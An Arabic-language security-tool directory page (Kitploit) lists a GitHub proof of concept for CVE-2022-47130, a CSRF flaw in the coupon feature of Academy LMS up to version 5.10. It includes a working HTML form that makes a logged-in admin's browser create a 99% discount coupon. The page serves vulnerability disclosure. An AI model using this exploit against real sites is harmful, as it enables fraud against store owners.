Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-47130 — Academy LMS <= 5.10 CSRF | Kitploit
أدوات/GitHubGitHub/openxp-research/cve-2022-47130
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubopenxp-research/cve-2022-47130

CVE-2022-47130

Academy LMS <= 5.10 CSRF

عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-47130

Academy LMS <= 5.10 CSRF

الوصف

Academy LMS هو تطبيق يمكن للأشخاص من خلاله إنشاء الدورات التدريبية والإعلان عنها. ميزة إضافة قسيمة معرضة لثغرة CSRF لعدم وجود رمز مميز يمنع هذا الهجوم.

إثبات المفهوم (POC)

الخطوة الأولى في إثبات المفهوم هي تسجيل الدخول إلى المنصة باستخدام حساب مستخدم إداري.

بعد ذلك، ما عليك سوى الوصول إلى الصفحة التي تحتوي على كود استغلال الثغرة، ولاحظ أنه تم إنشاء قسيمة جديدة تلقائيًا.

الكود المستخدم في الاستغلال:

<html>
   <body>
   <script>history.pushState('', '', '/')</script>
     <form action="https://target.com/admin/coupons/add" method="POST">
       <input type="hidden" name="code" value="vinix" />
       <input type="hidden" name="discount&#95;percentage" value="99" />
       <input type="hidden" name="expiry&#95;date" value="12&#47;11&#47;2022" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>
تنزيل الأداة